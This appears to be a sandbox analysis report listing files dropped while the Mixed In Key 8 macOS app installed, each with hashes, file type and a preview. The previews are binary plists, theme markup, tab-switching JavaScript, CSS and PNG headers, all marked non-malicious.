SHA1:	9C7815AD879DA2E3CC31152EF8FB3929E62B913E
SHA-256:	9E71E45D443879FD4D56708A2BD89CBE18767E6B3E987E1E4F41E51E557A5CDC
SHA-512:	9C73535FA31DD4A686210766A2E185F6000F1BA6CB902D47FB76BF59324EE063126CD4DC4DF718B34EFB52297FAEC788F3D1B7A357B2EAD3848987686706AFAA
Malicious:	false
Preview:	bplist00..............T.UX$versionX$objectsY$archiverT$top........9.......#.$....2.H.P.].k.l.m.r.x.y.z.{.~...............................................................A.B.C.V.Y.\.].g.h.i.s.t.{...........................................................!.,.-.3.4.7.>.C.D...I.J.S.T.d.e.h.k.t.u.y.z...........p.............................................................'.(.).1.2.6.7.:.E.H.I.U.V.W.[.\._.`.c.a.d.g.h.i.j.k.l.m.p.q.v.w.\|...........................................................................................!."..+.,.6.7.8.9.A.B.C.M.N.O.P.W.X.Y.Z.c.d.e.f.n.o.p.v.w...............'.#...$.%.&.'.(.).*.+...,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.G.H.I.J.K.L.M.N.QU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..............l...l..7..8..... ...!."[NSClassName...._..MIKMissingWindo

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_tRca1P Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	34970
Entropy (8bit):	6.785635251290525
Encrypted:	false
SSDEEP:	768:Xqw2FgDBEaQGgX8eEYy5LbgleEYyd8QcVgqeEYycl9vA9t2pKwr2:XP2Fg9EaQB8LhglL6Q4gqLYlpA/w6
MD5:	413233CA73AE35CCFF9DE98D1B5EF3FC
SHA1:	3FCB124B3BE42185A8F7A3D59C603EF1FE2A1E06
SHA-256:	2CD5B0D5A3CD10461E0FBCEF2CABFA056897E851D30042CD347544332B71A399
SHA-512:	3300FA96FA73960F46D7E3F47EFAD3D38072422935CBDDEE4D78F403801B866659C8471452227C9B0E9FBF4F0C9B76CFB49799132723C1E6E783572B299FBF57
Malicious:	false
Preview:	bplist00..............h.iX$versionX$objectsY$archiverT$top........?.......#.$....2.J.R.o.p.q.r.z.{.~...................................................................<.=.>.Q.T.W.X.b.c.d.n.o.v...............................................................".)..1.2.5.<.?.D.E...J.S.T.d.e.h.k.t.u.y.z............................................................................... .%.0.1.2.:.;.?.@.C.N.O.Z.[.\.]._.k.n.o.z.{.\|.................................................................................................#...%.'.+.2.3.4.;.<.=.>.G.H.I.J.R.S.T.U.\.].^.e.f.g.n.o.p.q.x.y.z.{...........9...3."...4.5.6.7.8.9.:.;...<.=.>.?.@.A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..............m...m..=..>..... ...!."[NSClassName...._.!MIK

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_touKxZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	14864
Entropy (8bit):	6.572123617273071
Encrypted:	false
SSDEEP:	384:rygJHBswqRL/MMS/rYeEYNg7zAj2Vk82e9uPf19:ryg4AMeEYyG2nZ9uPd9
MD5:	B93DD54C844528F00558593DB22E19E7
SHA1:	4748ABC7C3259B4D327A654AC35A1F079C56B8E5
SHA-256:	F3CF1864096177B284244B6A79A62C7223DB0202EFDEA5440D35A92A2F5A3026
SHA-512:	F4B7A696E1A435A52CF41DE7CBD699B277DDC58106286B45A6440846EFC6C9A9A885749B6158A3C9BA2C442CF8D0FFB900DBBFB9554E9F7F63BE55E808B57C55
Malicious:	false
Preview:	bplist00............../.0X$versionX$objectsY$archiverT$top...............#.$....2.C.K.h.i.j.k.s.t.w...................................................................................#..+.,.1.2.6.;.G.H.P.S.V.W.X.].}.~............................................................................................./.3.7.8.9.:.?.@.D.K.L.M.P.U.V.b.f.j.k.l.m.v.w...y.\|.....................................x............................................... .!.".#.$.%.&.).,U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.................... ...!."[NSClassName...._. MIKPianoKeyboardWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.B..4.5.6.7.8.9.:.;.<.=.>.?.@.A.....9.@.H.q.s..............."....D.E.F.G.H.I.JZNSKeyPathsXNSObj

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_y4Svuo Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	1780
Entropy (8bit):	6.653688302442843
Encrypted:	false
SSDEEP:	48:hR1Ws0HG9mvT86pq7jDE5YyoCFCegCIg3wIAldxh8:H1WKgoXIOf9x2Yldx+
MD5:	159E1B9C06AFE6D91733E96364910CCE
SHA1:	CF5112F5B2A716B815A84329935622DF640C1C29
SHA-256:	AC544DD68364AA36733460B705A5B51842FADF1D270915AEF3CC51F03C872C62
SHA-512:	0956F5A3EDE0B8FD7D2F6464D2E93C915097E42FCCDFD76D58B78B0A0EFD6BA4BB9BC4DD4ED1B2FDC79F828DA05BCE1EF00E4A9129AF51A37E4879622041FDAF
Malicious:	false
Preview:	bplist00.........X$versionX$objectsY$archiverT$top.......-...#$.28@MWXY^bcfjknvw{.....................U$null.......................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....". ...+...+..,.!. .!"[NSClassName...._.#MIKSegmentKeySelectorViewController.%&'(Z$classnameX$classes^NSCustomObject.')XNSObject.+.,-ZNS.objects....%&/0\NSMutableSet./1)UNSSet.+.37.456..........9:;<=>?ZNSKeyPathsXNSObjectXNSValues..........A BCDEFGHIIKLWNSFrame_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTouchBar................. NBDEOFQRLTLVZNSSubviews[NSFrameSize..............._..{{20, 20}, {250, 250}}_..MIKCamelotControl.%&Z[\NSCustomView.Z\])VNSView[NSResponder.+._a.`......%&deWNSArray.d).+.ga.h...._..hasLightBackground.%&lm_.)NSIBUserDefinedRuntimeAttributesConnector.l).opq..>tuXNSSource]NSDestinationWNSLabel........\camelotWheel.%&xy_..NSNibOutletConnector.xz)^NSN

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_y5sqOg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	8291
Entropy (8bit):	6.563859398387655
Encrypted:	false
SSDEEP:	96:Sq1W99Ss9xBiE0lgm32MVgjOza6MT0D5MdtbZPAVwzVH1495z0X4AH5ybercUT+V:71W99SxE0lUjeEYNMtKwB1495quUnEz
MD5:	58AEFCE1102099AB9D547751688F0978
SHA1:	20B7169AF931F5BACFF9F06C63B8D2DE3D787799
SHA-256:	843527F8B09FB1B214DC734891C0771947B6902ABC1D6D802AD39BD3CF429474
SHA-512:	D7C19706785F85FD041FD7B4E3F4EC1D3135B58C4B0DCDAE76E9F43DE3479C12BA065B1D568567F0A3442355DE0B0034E6D080FC2FEAD25982948B99E681D56A
Malicious:	false
Preview:	bplist00..............N.OX$versionX$objectsY$archiverT$top.......H.......#.$.*...2.7.?.N.O.T.f.g.h.x.y.................................................................................'.3.?.d...@.A...B.C.D.E.H.KU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....;.9.5.F...F.E.G.:.. ...!."[NSClassName...._..MIKTraktorAccessViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.6..4.5...2.&..8.9.:.....<.=.>XNSSource]NSDestinationWNSLabel.....0.1..@... .A.B.C.D.E.F.G.F.I.J.K.J.M_..NSOriginalClassNameZNSSubviews_..NSNextResponderXNSvFlags]NSNibTouchBar[NSFrameSize................/VNSView..+...P.6..Q.R...".&..U.V.W.X...B.Y.C.D.Z.[.\.].^._.`.<.<.K.J.d.eVNSCellWNSFrame_..NSAllowsLogicalLayoutDirection_..NSHuggingPriority[NSSup

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/.BC.T_lkyc8j Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.105485741649838
Encrypted:	false
SSDEEP:	12:TMHdgo+tJVEdQiCXFypgqypEogLDGLXNukUgw7mgOGt7SgOGFB99n:2dfyiwgOqypiOLdukUgwrOGtPOGFD9
MD5:	92BFCE18DDF9194FE31CD0664C2A82CD
SHA1:	BEC40D7A055D513762F1ACAD41BC8FC8C77A7A6C
SHA-256:	B69C7819208EF063A20FD071C45021A0F7CB51F2ED24E87479AFE8B50D40B1C7
SHA-512:	DE92D782C3DD6E9647697AB47F632E26E3E9B9B85EE7B47978D2636B9F62EBAE135E1AEA17C978CE8548762DC6AE3BA75B5612EF224D7A0154E17D24B0279B34
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>tableHeaderBackgroundImage</key>..<string>header-background.png</string>..<key>name</key>..<string>Default</string>..<key>version</key>..<integer>0</integer>..<key>mainThemeImage</key>..<string>main-theme.png</string>..<key>analysisMessageImage</key>..<string>analysis-message.tiff</string>..<key>topURL</key>..<string>html/top.html</string>..<key>labelColor</key>..<string>102 120 102</string>..<key>tableColor</key>..<string></string>..<key>tableHighLightColor</key>..<string>25 203 255</string>..<key>tableHighLightBackgroundImage</key>..<string>row-background.png</string>..<key>tableHighLightNoFocusBackgroundImage</key>..<string>row-background-nofocus.png</string>..<key>tableHighLightNoFocusColor</key>..<string></string>..<key>tableLinkColor</key>..<string>0 0 255</string>.</dict>.</plist>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/.BC.T_2MRQNU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	1546
Entropy (8bit):	5.015020480535862
Encrypted:	false
SSDEEP:	12:BMQtuzuo9qv6QclfhVD3cc/JqJmW04NbxfGfIzyENvODq6y4wemDGCEDcjGOlvf8:WCuqspVrcOiI4NbbbzbNnO6RrG9Gh+3J
MD5:	157F6800B8132247A46AFF4391D65B27
SHA1:	BDE682B657A278B12BC8B4C44E695435B9222F44
SHA-256:	99542796EDE3968AFA0FE944DE86887558A0C0AE992A840DB570B602715E5AB0
SHA-512:	90366B01338543E67F364E5FD80809ADDCD2E0E55F17D67BE06A2E1AF830709E1417B120E122EE6D2DEAADF4E20632E37FA8DE05E11B4ADFF7FEFEBD6E6EF5FA
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<title></title>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<link rel="stylesheet" href="top.css" type="text/css" media="screen, print" charset="utf-8">..<script type="text/javascript" src="top.js" charset="utf-8"></script>.</head>.<body>..<div id="logo-left" onclick="selectTab('browse'); window.location='mik://browse'"></div>..<div id="menu-left">...<a id="browse" class="first tab selected" onclick="selectTab('browse');" href="mik://browse" title="Switch to the browse panel">....<span class="contents">Collection</span>...</a>...<a id="tagedit" class="tab" onclick="selectTab('tagedit');" href="mik://tagedit" title="Edit file tags">....<span class="contents">Tags</span>...</a>...<a id="personalize" class="tab" onclick="selectTab('preferences');" href="mik://personalize" title="Personalize your settings">....<span class="contents">Settings</span>...</a>..</

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/.BC.T_JSBKnC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1365
Entropy (8bit):	4.937763229891162
Encrypted:	false
SSDEEP:	24:nJRd/aaRR+fqRRKa9RRg1RR+fzRRKawRRgg4RR+fzRRKa9RRgNMRR+fzRRKa9RR/:nJR5aayfqGa9M1yfzGawMg4yfzGa9MNz
MD5:	7366249E912217EB37327DDD26C91CF5
SHA1:	0FE27D2B2B10C0E80A7A85660626A9FA3CFC8957
SHA-256:	86783DCB04B7D13C9DFF3B47DAF1AA1B2462339D5E37CDE3CA0C4B587283BACD
SHA-512:	F354E70B8C7A5091000FDBA82DDD0C0F6D209AEBAFCEF9C880BD7ED8B56473129F9F766EC54D03E6F0EBAF9C4E9F82F77B71AEACA2B5D6B6DD41DAB8F9F19AE8
Malicious:	false
Preview:	/..Javascript for Mixed In Key top theme..Copyright 2008 Mixed In Key LLC.. /../.The following functions are required for navigation. /..//.Selects the tab with the specified identifier after.//.the the pane selection changed in the appliation..//..function selectTab(tabId).{..if ( tabId == 'browse' ) {...document.getElementById('browse').className...= 'first tab selected';...document.getElementById('tagedit').className..= 'tab';...document.getElementById('personalize').className.= 'tab';..} else if ( tabId == 'tagedit' ) {...document.getElementById('browse').className...= 'first tab';...document.getElementById('tagedit').className..= 'tab selected';...document.getElementById('personalize').className.= 'tab';..} else if ( tabId == 'preferences' ) {...document.getElementById('browse').className...= 'first tab';...document.getElementById('tagedit').className..= 'tab';...document.getElementById('personalize').className.= 'tab selected';..} else {...document.getElementById('browse').cl

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/.BC.T_vkMSMQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	3808
Entropy (8bit):	5.252982103180177
Encrypted:	false
SSDEEP:	48:sAqAeItbEKsxthY2eQ8Ovv8QAAOkVGU7+UhRKnHuV5llrfqgESO062WgpL14c/Na:pqItb4q/i3AFksC1jKnHuvugE+/h8Ltx
MD5:	41FEACAB6AC6F3756FF7A69B36582870
SHA1:	020B00230C07EADE7033FCD783A6D437AB832EFB
SHA-256:	229AB2959BB8F724BDBA9416C102791B8FC6FDD3DCBE49B5B37082A9361869E9
SHA-512:	C71ECF25E25507316AE3C8B6C75987516EF5C2FCB657CCB5AD5CD86948B6C470A7F629DECE79A408269F9CF5D0C42EBDEA49B1FBD57D286CB2411AFB61A888F0
Malicious:	false
Preview:	/..CSS for Mixed In Key top theme..Copyright 2008 - 2014 Mixed In Key LLC.. /..html {..height:70px;.}.body {..height:70px;..margin:0;..padding:0;..font:14px "Roboto";..background-color:rgb(0, 32, 78);..overflow:hidden;.}.#logo-left {..height:63px;..margin:0;..background:url("../images/mik-top-left.tiff") 15px 11px no-repeat;..background-size: 138px 52px;.}./#logo-right {..position:absolute; right:0; top:0;..height:88px;..width:459px;..margin-right:20px;..background:url("../images/mik-top-right.tiff") no-repeat;..background-size: 459px 88px;.}././* simulated tabs /./#menu {..position:absolute;..top:24px;..left:262px;..height:40px;..background:url("../images/top-menutheme.png") repeat-x;..border-left:1px solid #c8c8c8;.}.a.tab {..display:table-cell;..margin:0;..padding:13px 15px 12px 15px;..border-left:1px solid transparent;..border-right:1px solid #c8c8c8;..text-align:center;..text-decoration:none;..color:rgb(120, 120, 120);.}.a.tab:hover {..background:url("../images/top-tab-hover

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_2XIwXW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2160
Entropy (8bit):	7.898414881972223
Encrypted:	false
SSDEEP:	48:9KECxN4pG/K/e+zWgzM4ik6BCucf03iJhDEjtKh/DM1z:Y7Nvi/hqgzpN6AuCMtKh/At
MD5:	781CB2090B079031C608C0EDFF628A26
SHA1:	9A4114A762607A9FA34F356EE0F7523B188C17A5
SHA-256:	F5E9605AEDCA0134AAD16B2FEB441D4E163C106855457AFBC7F2183B80B31831
SHA-512:	CA54CBA0D89AC2B9530D1698BDE4F616E763E0F73CF98CB82B799B73DE05D613547B52BE8920E048A7A1688CD8274DBFD98259AFBAB661EC86E39787ED090222
Malicious:	false
Preview:	.PNG........IHDR...8...8.......;.....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&.......E.....z.d/J.ZE(.(b..-..nL.....~..7.}ov...r.4......R..il\|Bj......A4%U..N$.A.s.{..z..[V.{.w.w.......@.G.....q.Y...<.).t......9Nyx...+=.Y"\|@5-..M.S.%.@.H8..qR>......inf....O.....b..N......~N..>.!....?F......?.a...=..5..`.....5.._.M'.Tq.....V.J.p.8.da.sZHO.Ln....}&....wVQ.y..g....E...0.......HP.E.a..P@.<.14.r?#....{2u$j.tbD.A{6.=.Q..<.("q.C....A...O.y..\..V........;........sM^\|..v.WG..yz....?.W.1.5..s...-_..)....U..K.uZ17.l.;=......s...7V..g.jH....U.O^...g..c.)1&v..!......K...`m.....).m..$.``.../]?[x.F...Q....T....d4...o..........(./l...mSq...e.ns.....}.nk.~8..X<...R5. ...v.z..)....9R.,.....bR.P.CRR.%.eK...Ub.v...n..9B..Je........R...R.~N....o...E.x.....=IDATh..[[N.1.m.\|.Iw.....:. ...X.e...PV.].....bV.t..+h.y...=.83~Llai....~.3..~HY...........K...@....>L..._ZZ....S.s,... A===.B....G.O..q....R.].....g.X.(.JOnooYw..nnn..I...d5^H".G777.X."V.Q.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_6qDv9w Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 40 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4293
Entropy (8bit):	7.789638893526219
Encrypted:	false
SSDEEP:	96:4Zka8VKV5VBMGTZRa6gZkjLcN78JPFzrvZQxVmJ0:4Zk9VKV5VBkKIN7aw
MD5:	DEB2446FBBF5FA708348D76A2AB2D541
SHA1:	26FC3F0E7F0603A5C0663A525C8BD75C39765262
SHA-256:	41C556FAE0A8FE1B690393244D14381FFD902587578B366C7EF3C23A6A058639
SHA-512:	FC9AC66D9EF0DA305BFA02313A0CC3EEE0580513BE69D7BA45A6BD3E91680FE07DCFC1F1475BE8EBA7ABFECFD958E1756BAEDC7E725D9D33B0B46E521B482B60
Malicious:	false
Preview:	.PNG........IHDR...(...L.......bv....iCCPICC Profile..H....TSY...{/..B..z........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv....\|........n.=....\c.x.....L~...=&6......Q..P`..<...@.j..W}.D..c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q....\9..\|r..f....0O... P.L~2....<=....`P6.9\..Qva.0.y(.=`...b......Ou..R3A\..L.......#.3W........C..J../lf>t...V......2...lO3.".c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}..!....+3%.o...q?.D/oq..)...........+......f..l.S....uB...8 .0.+31gf_....U\|NrJ&..=%.t..ejL.4...`........%H.0.....Q.Mr.s...h.....\|N;..G.8....fs3[.`..H.Y......&....'....?... .,.,..2..d.<...."........u..8.Z.9p.\.7A/........`.\|.S...!*D.. uH.2.,!{.....0(....!.$..MP.T..C..z...,t....A...h.z.}........l....p.../...p......j.8.._.o....~.O".!#..b..#.H...$!\|d-R..".H#.t#w.......ah.:.....DbX......rL........L`.c.X........`.....l)........a?.p8y.......V.....p..>.(n...+.....<.../....._......d.:...C.#p.....c...~.3..Q..Ct$....U...v.m

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_7HwJQ3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 18 x 35, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3708
Entropy (8bit):	7.730834492790864
Encrypted:	false
SSDEEP:	96:5Zka8VKV5VBMGTZRa6gZkjLcN78JPFdSp/ThZMqzzZc:5Zk9VKV5VBkKIN7cSp/5+
MD5:	D24DBD3A38FD6660C76874584E6784A8
SHA1:	BDA0CC006DE711AC14D6826C9DC4559D49509A46
SHA-256:	B9A4B5E37C1ED4DD9E1BFD2FA505BE413D8DC2A88D229B0296CF598029FE9495
SHA-512:	80D6783C918BED958B8284160859F76515B0EB874B0D2E0E33477C4026C479A0D917E7A37B6CCD90B839E58E90A13384592FB3053FFB7775513C728070A78676
Malicious:	false
Preview:	.PNG........IHDR.......#.............iCCPICC Profile..H....TSY...{/..B..z........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv....\|........n.=....\c.x.....L~...=&6......Q..P`..<...@.j..W}.D..c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q....\9..\|r..f....0O... P.L~2....<=....`P6.9\..Qva.0.y(.=`...b......Ou..R3A\..L.......#.3W........C..J../lf>t...V......2...lO3.".c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}..!....+3%.o...q?.D/oq..)...........+......f..l.S....uB...8 .0.+31gf_....U\|NrJ&..=%.t..ejL.4...`........%H.0.....Q.Mr.s...h.....\|N;..G.8....fs3[.`..H.Y......&....'....?... .,.,..2..d.<...."........u..8.Z.9p.\.7A/........`.\|.S...!*D.. uH.2.,!{.....0(....!.$..MP.T..C..z...,t....A...h.z.}........l....p.../...p......j.8.._.o....~.O".!#..b..#.H...$!\|d-R..".H#.t#w.......ah.:.....DbX......rL........L`.c.X........`.....l)........a?.p8y.......V.....p..>.(n...+.....<.../....._......d.:...C.#p.....c...~.3..Q..Ct$....U...v.m

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_AFwIMg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 146 x 150, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10419
Entropy (8bit):	7.972878199886934
Encrypted:	false
SSDEEP:	192:ymSapbFUiVk1GlZtVXkgxcDbz7a3Ns63xhGC8VNLNOoKkzsoQjlr9:pSapbFzVk1GLxcXzu3N3hEC8VNLnJIz3
MD5:	024BC5E07D0FD27565BDD69BFF536ACA
SHA1:	D3F8CE77BB32DEB533C16B29114E39B0B97124C1
SHA-256:	BFD5389E9936485AC6FBEC9190D2ADC110CDB4A2B04BC16EB8A547BAE1E1924F
SHA-512:	CC1EC72497B463FA43C934A88D5FE69E55D7CF357DB9417902742355DAF619ECEFC91A9D1AEA868E674FFE2E5EDCA4226CA0B1DCC0712F2E87D4E7CDE3F3DE8A
Malicious:	false
Preview:	.PNG........IHDR..............4!.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...,PLTE.............................................................................................................................................................................................................................................................................................................9.u..'.IDATx.L\|.c.<.,...)..,+9.=9.3...vo....w/....^WU...c[.D"t...F.!..BN......>....k.R.x.XJ.%616x..bi...=.-)..v.>.C...~.l....4.BC.9L...1....j..o..P..g..x...k..16.l.=......7.o......r.\|.....d............}0g.?..9...=........`...:...Rt.../<[-.,.0v,.-..s..~.C.m.......Y.....M`HZ}{.d..3W.3p.6.w.:.k,E.X+.N\|...N;.U...b.X..Yp.x.......V.{b%...Ke..>N.....-.(../.9..V.^......A..-..i.....]{..X....o6.l..}H.`..VfM.Mc..I.?..^".........5..b..Z.....^..m ...E..1..c.Uy).k.pI.....<.8V4.H. .x_..V.>V...........<%\..C.;.b_. ..>.t..ECA..}..k....\|.)&o.n.^.>...........8..`.....? ..@..[..B6a

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_DUw19C Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	559
Entropy (8bit):	7.483323322503398
Encrypted:	false
SSDEEP:	12:6v/7vHh5vGvBLN74zVXxnTA51pZi09a63suv8Vl4xezr99TIjoF5:45vub7qVXlIRds5xx9Ijo/
MD5:	5380EBE31A48AD7A056836C7A524562F
SHA1:	44EA8FB34D4D99E6106FBBC397B1D0A2A1C63B88
SHA-256:	EACA04DF83B1722C80CDA74061F069497AF4298E72B1622B0B6BD76DD7676D1A
SHA-512:	8CED57661DFE4B2A6C3AB38AE54DF5F9FBFFC1137F3839833AF26F898601E813FB59158C4EB6DDE03503155D9455D45B773010F43A0712F5155378EE2E34BAEF
Malicious:	false
Preview:	.PNG........IHDR...$...$.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..m.0.E...0.7(... ..n..m'.:..d...a............w.../..N....Yy.@y.#\..>.....=.......n.^U....5...~.>...@y..S...Cr..... G..]...n...U..I.C.32}pq.w../0U.v.)....l..m.@..P.Y).h.R.&..`P....J....6....S..4j..,.fTk.q\..&..{...6.MZa..9...&..i..../........M..Mb......ZdI...-r.....2!.`.]...Q...[G..%.k.<x..09QA8..%...P9....h%S-.....B.).+&X.T\|..^x.!.V.A...s..d5/...x@.?A..?/t..\....R.@H(I..J.:Z...j%..`.......An....ENi..H.u+ )..@"......re.+@.Z..:...'[...`..fa.zp{.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/.BC.T_F3OrAS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 44 x 44, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.316707006483209
Encrypted:	false
SSDEEP:	12:6v/7rRH2jAttvuAVuINlmPxVCYXiGMHqAo1:batmYNOxtGql1
MD5:	2DD935B011D02BCB06B68E3AE41D6551
SHA1:	0D110A67331FD07233808D7605A0A765751F4561
SHA-256:	5E0977973DC355274F89298416E19A61C93E563A596CCC82D7B62D58EEC8FD21
SHA-512:	93AFE8A63EDE4A8242D2D991FA20E28FEACF74F9073F0BB80BA6BA00F01ABBB7019A2DE6C6F2FA3EF96A33CD3E4D94BE2CD9C8ED1783D8461CA4DFA96271A794
Malicious:	false
